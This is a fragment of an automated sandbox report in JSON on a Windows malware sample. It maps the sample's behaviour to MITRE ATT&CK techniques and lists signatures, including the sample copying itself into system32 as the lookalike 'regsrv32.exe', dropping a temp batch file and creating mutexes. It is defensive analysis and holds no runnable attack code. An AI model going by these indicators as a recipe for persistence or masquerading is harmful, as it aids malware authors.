"mitre_attcks": [{"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 4, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 17}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 3}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2473.bat\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"CopyFileA\" to copy C:\\f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe to new location %WINDIR%\\system32\\regsrv32.exe (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Aeb-75\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Aeb-75\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"regsrv32.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"\n \"regsrv32.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 